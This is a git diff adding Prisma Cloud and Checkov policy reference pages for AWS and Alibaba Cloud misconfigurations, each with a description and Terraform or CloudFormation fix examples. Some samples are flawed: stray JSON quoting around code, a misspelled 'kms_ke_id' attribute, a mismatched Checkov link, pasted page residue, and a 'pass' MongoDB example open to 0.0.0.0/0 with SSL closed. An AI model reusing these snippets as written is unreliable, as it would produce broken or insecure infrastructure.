+ +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 60b324fc-fee3-4db3-8668-c23832ac5b7c + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/NeptuneClusterInstancePublic.py[CKV_AWS_102] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Amazon Neptune is a graph database service that for high-performance graph database engine. +Neptune supports the popular graph query languages Apache TinkerPop Gremlin and W3C's SPARQL. +Neptune also gives you the ability to create snapshots of your databases, which you can use later to restore a database. +You can share a snapshot with a different Amazon Web Services account, and the owner of the recipient account can use your snapshot to restore a DB that contains your data. +You can even choose to make your snapshots public -- that is, anybody can restore a DB containing your data. +This is a check to make sure that your database resource is not Publicly available. +This is the resources' default behaviour. +https://docs.aws.amazon.com/neptune/latest/userguide/security-vpc.html. + +//// +=== Fix - Runtime + + +AWS Console + + +First find your neptune instance id with the AWS commandline: +---- +aws neptune describe-db-instances +---- +Once you have your instance id you can unset its public status with: +---- +aws neptune modify-db-instance aws neptune --db-instance-identifier & lt;your db identifier> --no-publicly-accessible +---- +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_neptune_cluster_instance +* *Arguments:* publicly_accessible this default to false, so the check is to ensure it's missing or false. + + +[source,go] +---- +{ + "resource "aws_neptune_cluster_instance" "example" { + count = 2 + cluster_identifier = aws_neptune_cluster.default.id + engine = "neptune" + instance_class = "db.r4.large" + apply_immediately = true +}", +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-43.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-43.adoc new file mode 100644 index 000000000..29fb47985 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-43.adoc @@ -0,0 +1,104 @@ +== AWS Load Balancer is not using TLS 1.2 + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 72141d35-c371-4aa6-ae6d-1a37dd26d59d + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/ALBListenerTLS12.py[CKV_AWS_103] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|CloudFormation,Terraform,TerraformPlan,Serverless + +|=== + + + +=== Description + + +A listener in an AWS Load Balancer is a process that checks for connection requests. +Users can define a listener when creating a load balancer, and add listeners to the load balancer at any time. +The HTTPS listener enables traffic encryption between your load balancer and the clients that initiate SSL or TLS sessions. + +//// +=== Fix - Runtime + + +AWS Console + + + +. Go to the Amazon EC2 console at https://console.aws.amazon.com/ec2/. + +. On the navigation pane, under LOAD BALANCING, select Load Balancers. + +. Select the load balancer and choose Listeners. ++ +4.Select the check box for the TLS listener and choose Edit. + +. For Security policy, choose a security policy. + + +CLI Command + + + + +[source,text] +---- +{ + "modify-listener +--listener-arn & lt;value> +[--port & lt;value>] +[--protocol & lt;value>] +[--ssl-policy & lt;value>]", +} +---- +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_lb_listener +* *Attribute:* protocol - (Optional) + +The protocol for connections from clients to the load balancer. +For Application Load Balancers, valid values are HTTP and HTTPS, with a default of HTTP. +For Network Load Balancers, valid values are TCP, TLS, UDP, and TCP_UDP. +Not valid to use UDP or TCP_UDP if dual-stack mode is enabled. +Not valid for Gateway Load Balancers. + + +[source,go] +---- +{ + "resource "aws_lb_listener" "front_end" { + load_balancer_arn = aws_lb.front_end.arn + port = "443" + protocol = "HTTPS" + + ssl_policy = "ELBSecurityPolicy-TLS13-1-2-2021-06" + certificate_arn = "arn:aws:acm:eu-west-2:999999999:certificate/77777777-5d4a-457f-8888-02550c8c9244" + + default_action { + type = "forward" + target_group_arn = aws_lb_target_group.front_end.arn + } + +}", +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-97.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-97.adoc new file mode 100644 index 000000000..a2b55b12f --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-97.adoc @@ -0,0 +1,59 @@ +== AWS Kinesis Video Stream not encrypted using Customer Managed Key + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| c62e89dd-600d-48d3-afc0-0de3510534b3 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/KinesisVideoEncryptedWithCMK.py[CKV_AWS_177] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +This is a simple check to ensure that Kinesis Video Stream is using AWS key management - KMS to encrypt its contents. +To resolve add the ARN of your KMS or link on creation of the cluster. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_kinesis_video_stream +* *Attribute:* kms_key_id - (Optional) + +The ID of the AWS Key Management Service (AWS KMS) key that you want Kinesis Video Streams to use to encrypt stream data. +If no key ID is specified, the default, Kinesis Video-managed key (aws/kinesisvideo) is used. + + +[source,go] +---- +resource "aws_kinesis_video_stream" "default" { + name = "terraform-kinesis-video-stream" + data_retention_in_hours = 1 + device_name = "kinesis-video-device-name" + media_type = "video/h264" + + kms_ke_id = "ckv_kms" + tags = { + Name = "terraform-kinesis-video-stream" + } +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-99.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-99.adoc new file mode 100644 index 000000000..c56fc8e84 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-99.adoc @@ -0,0 +1,56 @@ +== AWS FSX Windows filesystem not encrypted using Customer Managed Key + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 4a813b6d-315e-4a4c-bef8-6266b8c8290f + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/FSXWindowsFSEncryptedWithCMK.py[CKV_AWS_179] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +This is a simple check to ensure that FSX Windows file system is using AWS key management - KMS to encrypt its contents. +To resolve add the ARN of your KMS or link on creation of the cluster + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_fsx_windows_file_system +* *Attribute*: kms_key_id + + +[source,go] +---- +{ + "resource "aws_fsx_windows_file_system" "example" { + active_directory_id = aws_directory_service_directory.example.id + kms_key_id = aws_kms_key.example.arn + storage_capacity = 300 + subnet_ids = [aws_subnet.example.id] + throughput_capacity = 1024 +}", + +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-logging-32.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-logging-32.adoc new file mode 100644 index 000000000..ab821158a --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-logging-32.adoc @@ -0,0 +1,69 @@ +== Postgres RDS does not have Query Logging enabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 815e430a-9f43-4d25-b6ef-d93ea5239a1d + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/master/checkov/terraform/checks/graph_checks/aws/PostgresRDSHasQueryLoggingEnabled.yaml[CKV2_AWS_27] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +This check ensures that you have enabled query logging set up for your PostgreSQL database instance. +An instance needs to have a non-default parameter group and two parameters set - that of _log_statement_ and _log_min_duration_statement_, these need to be set to _all_ and _1_ respectively to get sufficient logs. +_Note_ Setting querying logging can expose secrets (including passwords) from your queries, - restrict and encrypt to mitigate. + +=== Fix - Buildtime + + +*Terraform* + + +You will need to have a resource aws_db_instance that refers to your aws_db_parameter_group +attribute: parameter_group_name. + +With that in place the following parameters need to be set: + + +[source,go] +---- +{ + "resource "aws_db_parameter_group" "example" { + name = "rds-cluster-pg" + family = "postgres10" + ++ parameter { ++ name="log_statement" ++ value="all" ++ } + ++ parameter { ++ name="log_min_duration_statement" ++ value="1" ++ } +}", + + +} +---- + +For more details see the aws docs here: https://docs.aws.amazon.com/AmazonRDS/latest/AuroraUserGuide/USER_LogAccess.Concepts.PostgreSQL.html diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-networking-62.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-networking-62.adoc new file mode 100644 index 000000000..46b519d19 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-networking-62.adoc @@ -0,0 +1,77 @@ +== Deletion protection disabled for load balancer + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 9be5d82a-e667-49a5-bb21-c36ebec22f66 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/SSMSessionManagerDocumentLogging.py[CKV_AWS_113] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +This policy identifies Elastic Load Balancers v2 (ELBv2) which are configured with deletion protection feature disabled. +Enabling delete protection for these ELBs prevents irreversible data loss resulting from accidental or malicious operations. +For more details refer: https://docs.aws.amazon.com/elasticloadbalancing/latest/application/application-load-balancers.html#deletion-protection + +//// +=== Fix - Runtime + + +AWS Console + + + +. Log in to the AWS console + +. In the console, select the specific region from the region drop-down on the top right corner, for which the alert is generated + +. Go to the EC2 Dashboard, and select 'Load Balancers' + +. Click on the reported Load Balancer + +. On the Description tab, choose 'Edit attributes' + +. On the Edit load balancer attributes page, select 'Enable' for 'Delete Protection' + +. Click on 'Save' to save your changes +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_lb +* *Arguments:* enable_deletion_protection + + +[source,go] +---- +{ + "resource "aws_lb" "test_success" { + ... ++ enable_deletion_protection = true +}", + +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-storage-1.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-storage-1.adoc new file mode 100644 index 000000000..89e437a23 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-storage-1.adoc @@ -0,0 +1,84 @@ +== AWS QLDB ledger has deletion protection is disabled + + +=== Policy Details +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 7b025835-c70a-432b-8ee3-d791db453691 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/QLDBLedgerDeletionProtection.py[CKV_AWS_172] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|CloudFormation,Terraform,TerraformPlan,Serverless + +|=== + + + +=== Description + +Amazon Quantum Ledger Database (Amazon QLDB) is a fully managed ledger database for cryptographically verifiable transaction logging. +You can use the QLDB API or the AWS Command Line Interface (AWS CLI) to create, update, and delete ledgers in Amazon QLDB. +You can also list all the ledgers in your account, or get information about a specific ledger. +Deletion protection is enabled by default. +To successfully delete this resource via Terraform, deletion_protection = false must be applied before attempting deletion. +In CloudFormation the flag that prevents a ledger from being deleted by any user. +If not provided on ledger creation, this feature is enabled (true) by default. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_qldb_ledger +* *Arguments:* deletion_protection + + +[source,go] +---- +{ + "resource "aws_qldb_ledger" "sample-ledger" { + name = "sample-ledger" + permissions_mode = "STANDARD" ++ deletion_protection = true +} + +", +} +---- + + + +*CloudFormation* + + +* *Resource:* AWS::QLDB::Ledger +* *Arguments:* DeletionProtection + + +[source,yaml] +---- + +{ + "Type: AWS::QLDB::Ledger +Properties: ++ DeletionProtection: true + KmsKey: String + Name: String + PermissionsMode: String + Tags: + - Tag +", + +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/ensure-alibaba-cloud-mongodb-is-deployed-inside-a-vpc.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-alibaba-cloud-mongodb-is-deployed-inside-a-vpc.adoc new file mode 100644 index 000000000..7e50d0c8a --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-alibaba-cloud-mongodb-is-deployed-inside-a-vpc.adoc @@ -0,0 +1,66 @@ +== Alibaba Cloud MongoDB is not deployed inside a VPC + + +=== Policy Details +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 8f96497a-ecbd-4ee2-a77b-4495a21d521e + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/MongoDBInsideVPC.py[CKV_ALI_41] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + +Deploying your MongoDB database inside a VPC helps protect your data from unauthorized access or tampering by isolating the database from the public internet. +By deploying your database inside a VPC, you can help ensure that only authorized users with the correct permissions can access the data, and that the data is protected from external threats such as hackers or malware. + +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +{ + "resource "alicloud_mongodb_instance" "pass" { + engine_version = "3.4" + db_instance_class = "dds.mongo.mid" + db_instance_storage = 10 + vswitch_id = alicloud_vswitch.ditch.id + security_ip_list = ["0.0.0.0/0","10.168.1.12", "100.69.7.112"] + kms_encryption_context= { + + } + + # tde_status = "Disabled" + ssl_action = "Close" + # not set + network_type = "VPC" +} + + +resource "alicloud_vswitch" "ditch" { + vpc_id = "anyoldtripe" + cidr_block = "0.0.0.0/0" +}", + +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/ensure-api-gateway-caching-is-enabled.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-api-gateway-caching-is-enabled.adoc new file mode 100644 index 000000000..ab11c103e --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-api-gateway-caching-is-enabled.adoc @@ -0,0 +1,94 @@ +== AWS API Gateway caching is disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 09e59cb9-5aaf-489a-a20a-9b6a4246c0ca + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/APIGatewayCacheEnable.py[CKV_AWS_120] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,CloudFormation + +|=== + + + +=== Description + + +This checks that all methods in an Amazon API Gateway stage to ensure that they have caching enabled. +As AWS puts it "With caching, you can reduce the number of calls made to your endpoint and also improve the latency of requests to your API" and so if you need to minimise those, this will help. +See the AWS docs for more information: https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-caching.html + +//// +=== Fix - Runtime +To configure API caching for a given stage: +* Go to the API Gateway console. +* Choose the API. +* Choose Stages. +* In the Stages list for the API, choose the stage. +* Choose the Settings tab. +* Choose Enable API cache. +Wait for the cache creation to complete. +//// + +=== Fix - Buildtime + + +*Cloudformation* + + +* *Resource:* AWS::ApiGateway::Stage +* *Arguments:* CacheClusterEnabled + + +[source,go] +---- +{ + "AWSTemplateFormatVersion: "2010-09-09" +Resources: + CacheTrue: + Type: AWS::ApiGateway::Stage + Properties: + StageName: test + Description: test + RestApiId: test + DeploymentId: test ++ CacheClusterEnabled: true", + +} +---- + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_api_gateway_stage +* *Arguments:* cache_cluster_enabled + + +[source,go] +---- +{ + "resource "aws_api_gateway_stage" "examplea" { + deployment_id = aws_api_gateway_deployment.stage_api.id + rest_api_id = aws_api_gateway_rest_api.api.id + stage_name = "example" + cache_cluster_enabled = true +}", +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-acm-certificates-has-logging-preference.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-acm-certificates-has-logging-preference.adoc new file mode 100644 index 000000000..a97ca043b --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-acm-certificates-has-logging-preference.adoc @@ -0,0 +1,102 @@ +== AWS ACM certificates does not have logging preference + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 621fd08f-2fd2-4607-8203-a1f8c47477c9 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/ACMCertSetLoggingPreference.py[CKV_AWS_234] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +To guard against SSL/TLS certificates that are issued by mistake or by a compromised CA, some browsers like Chrome require that public certificates issued for a domain be recorded in a certificate transparency log. +The domain name is recorded, but not the private key. +Certificates that are not logged typically generate an error in the browser. + +//// +=== Fix - Runtime + + +Console + + +It is not possible to adjust transparency logging via console. + + +CLI + + + + +[source,shell] +---- +{ + "aws acm request-certificate \\ +--domain-name example.com \\ +--validation-method DNS \\ +--options CertificateTransparencyLoggingPreference=ENABLED \", +} +---- +//// + +=== Fix - Buildtime + + +*CloudFormation* + + + + +[source,yaml] +---- +{ + "Resources: + Example: + Type: "AWS::CertificateManager::Certificate" + Properties: + DomainName: example.com + ValidationMethod: DNS ++ CertificateTransparencyLoggingPreference: ENABLED", + +} +---- + + +*Terraform* + + + + +[source,go] +---- +{ + "resource "aws_acm_certificate" "example" { + domain_name = "example.com" + validation_method = "DNS" + ++ options { ++ certificate_transparency_logging_preference = "ENABLED" ++ } +}", + +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-all-data-stored-in-the-elasticsearch-domain-is-encrypted-using-a-customer-managed-key-cmk.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-all-data-stored-in-the-elasticsearch-domain-is-encrypted-using-a-customer-managed-key-cmk.adoc new file mode 100644 index 000000000..db0ad4fd4 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-all-data-stored-in-the-elasticsearch-domain-is-encrypted-using-a-customer-managed-key-cmk.adoc @@ -0,0 +1,60 @@ +== AWS all data stored in the Elasticsearch domain is not encrypted using a Customer Managed Key (CMK) + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 1fc1f970-29da-44e2-8b62-d668eb03671d + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/ElasticsearchEncryptionWithCMK.py[CKV_AWS_247] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +This policy identifies Elasticsearch domain which are encrypted with default KMS keys and not with Keys managed by Customer. +It is a best practice to use customer managed KMS Keys to encrypt your Elasticsearch domain data. +It gives you full control over the encrypted data. + +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +{ + "resource "aws_elasticsearch_domain" "pass" { + domain_name = "example" + + cluster_config { + instance_type = "r5.large.elasticsearch" + } + + + encrypt_at_rest { + kms_key_id = aws_kms_key.example.arn + } + +}", +} +---- \ No newline at end of file diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-ami-copying-uses-a-customer-managed-key-cmk.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-ami-copying-uses-a-customer-managed-key-cmk.adoc new file mode 100644 index 000000000..56b82c289 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-ami-copying-uses-a-customer-managed-key-cmk.adoc @@ -0,0 +1,60 @@ +== AWS AMI copying does not use a Customer Managed Key (CMK) + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| b372b0f1-471d-4c05-97c6-aa130e1fe314 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/AMICopyUsesCMK.py[CKV_AWS_236] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +This policy identifies AMI copies which are encrypted with default KMS keys and not with Keys managed by Customer. +It is a best practice to use customer-managed KMS Keys to encrypt your AMI copies data. +It gives you full control over the encrypted data. + +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +{ + "resource "aws_ami_copy" "pass" { + name = "terraform-example" + description = "A copy of ami-xxxxxxxx" + source_ami_id = "ami-xxxxxxxx" + source_ami_region = "us-west-1" + encrypted = true #default is false + kms_key_id = aws_kms_key.copy.arn + tags = { + Name = "HelloWorld" + test = "failed" + } + +}", +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-ami-launch-permissions-are-limited.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-ami-launch-permissions-are-limited.adoc new file mode 100644 index 000000000..a76f5d99c --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-ami-launch-permissions-are-limited.adoc @@ -0,0 +1,52 @@ +== AWS AMI launch permissions are not limited + + +=== Policy Details +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 10e7ef20-2277-41c2-be01-fdf747e2573b + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/AMILaunchIsShared.py[CKV_AWS_205] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + +It is recommended not to give the ability to launch AMIs across multiple accounts, and if it is implemented, make sure it is properly used. + +//// +=== Fix - Runtime +TBA +//// + +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +{ + "- resource "aws_ami_launch_permission" "remove_equivalent_block" { +- image_id = "ami-2345678" +- account_id = "987654321" +- }", +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-amis-are-encrypted-by-key-management-service-kms-using-customer-managed-keys-cmks.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-amis-are-encrypted-by-key-management-service-kms-using-customer-managed-keys-cmks.adoc new file mode 100644 index 000000000..1e6a0a735 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-amis-are-encrypted-by-key-management-service-kms-using-customer-managed-keys-cmks.adoc @@ -0,0 +1,68 @@ +== AWS AMIs are not encrypted by Key Management Service (KMS) using Customer Managed Keys (CMKs) + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 63cbc1a4-ad46-4bca-8d20-aabeb4afe527 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/AMIEncryption.py[CKV_AWS_204] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +This policy identifies AMIs which are encrypted with default KMS keys and not with Keys managed by Customer. +It is a best practice to use customer managed KMS Keys to encrypt your EFS data. +It gives you full control over the encrypted data. + +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +{ + "75 lines (62 sloc) 1.41 KB + +resource "aws_ami" "pass" { + name = "terraform-example" + virtualization_type = "hvm" + root_device_name = "/dev/xvda1" + + ebs_block_device { + device_name = "/dev/xvda1" + volume_size = 8 + snapshot_id = "someid" + } + + + ebs_block_device { + device_name = "/dev/xvda2" + volume_size = 8 + encrypted = true + } + +}", +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-api-deployments-enable-create-before-destroy.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-api-deployments-enable-create-before-destroy.adoc new file mode 100644 index 000000000..9fef53e4d --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-api-deployments-enable-create-before-destroy.adoc @@ -0,0 +1,60 @@ +== AWS API deployments do not enable Create before Destroy + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 9a8c2e43-cc8d-4113-ac3b-992a66780183 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/APIGatewayDeploymentCreateBeforeDestroy.py[CKV_AWS_217] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +It is recommended to enable create_before_destroy argument inside the resource lifecycle configuration block to avoid possible return errors such as `BadRequestException: Active stages pointing to this deployment must be moved or deleted` on recreation. + +=== Fix - Buildtime + + +*CloudFormation* + + +CloudFormation creates a new deployment first and then will delete the old one automatically. + + +*Terraform* + + + + +[source,go] +---- +{ + "resource "aws_api_gateway_deployment" "example" { + rest_api_id = aws_api_gateway_rest_api.example.id + stage_name = "example" + ++ lifecycle { ++ create_before_destroy = true ++ } +}", + +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-api-gateway-caching-is-enabled.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-api-gateway-caching-is-enabled.adoc new file mode 100644 index 000000000..0245c3a2b --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-api-gateway-caching-is-enabled.adoc @@ -0,0 +1,76 @@ +== AWS API Gateway caching is disabled + + +=== Policy Details +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 09e59cb9-5aaf-489a-a20a-9b6a4246c0ca + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/APIGatewayCacheEnable.py[CKV_AWS_120] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,CloudFormation + +|=== + + + +=== Description + +A cache cluster caches responses. +With caching, you can reduce the number of calls made to your endpoint and also improve the latency of requests to your API. + +//// +=== Fix - Runtime + +. Go to the API Gateway console. + +. Select an API. + +. Select Stages. + +. In the Stages list for the API, select the required stage. + +. Go to the Settings tab. + +. Select Enable API cache. + +. Wait until cache creation is complete. +//// + +=== Fix - Buildtime + + +*Terraform* + + +---- +resource "aws_api_gateway_rest_api" "example" { + +... + +... +} +---- + + +*CloudFormation* + + +---- +Resources: +Prod: +Type: AWS::ApiGateway::Stage +Properties: + +... +---- diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-api-gateway-domain-uses-a-modern-security-policy.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-api-gateway-domain-uses-a-modern-security-policy.adoc new file mode 100644 index 000000000..7955acc48 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-api-gateway-domain-uses-a-modern-security-policy.adoc @@ -0,0 +1,59 @@ +== AWS API Gateway Domain does not use a modern security policy + + +=== Policy Details +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 6a4bbef8-cb7f-43a6-8053-bc1d49994d08 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/APIGatewayDomainNameTLS.py[CKV_AWS_206] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + +AWS API Gateway Domain allows you to set the security policy. +Using TLS 1_0 allows you to use insecure cypher suites. + +//// +=== Fix - Runtime + +. In the AWS console, go to API Gateway. + +. Select Custom Domain Names. + +. Select the domain name to update and then Edit. + +. For Minimum TLS version, select TLS 1.2. + +. Select Save. +//// + +=== Fix - Buildtime + + +*Terraform* + + +---- +resource "aws_api_gateway_domain_name" "example" { + +... + +... +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-api-gateway-enables-create-before-destroy.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-api-gateway-enables-create-before-destroy.adoc new file mode 100644 index 000000000..73e151e8e --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-api-gateway-enables-create-before-destroy.adoc @@ -0,0 +1,59 @@ +== Ensure AWS API gateway enables Create before Destroy + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| d9b217ab-ce34-46f7-9879-d9679342ac10 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/APIGatewayCreateBeforeDestroy.py[CKV_AWS_237] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +It is recommended to enable create_before_destroy argument inside the resource lifecycle configuration block to avoid a possible outage when the API Gateway needs to be recreated during an update. + +=== Fix - Buildtime + + +*CloudFormation* + + +CloudFormation creates a new API Gateway first and then will delete the old one automatically. + + +*Terraform* + + + + +[source,go] +---- +{ + "resource "aws_api_gateway_rest_api" "example" { + name = "example" + ++ lifecycle { ++ create_before_destroy = true ++ } +}", + +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-api-gateway-method-settings-enable-caching.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-api-gateway-method-settings-enable-caching.adoc new file mode 100644 index 000000000..8969accf1 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-api-gateway-method-settings-enable-caching.adoc @@ -0,0 +1,60 @@ +== AWS API Gateway method settings do not enable caching + + +=== Policy Details +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| b89db1fa-40b5-4a4e-8415-18e5caab65aa + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/APIGatewayMethodSettingsCacheEnabled.py[CKV_AWS_225] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + +Enabling caching for API Gateway helps improve your API's performance by allowing clients to retrieve responses from a cache instead of making a request to the backend service. +This can reduce the load on your backend service and improve the overall responsiveness of 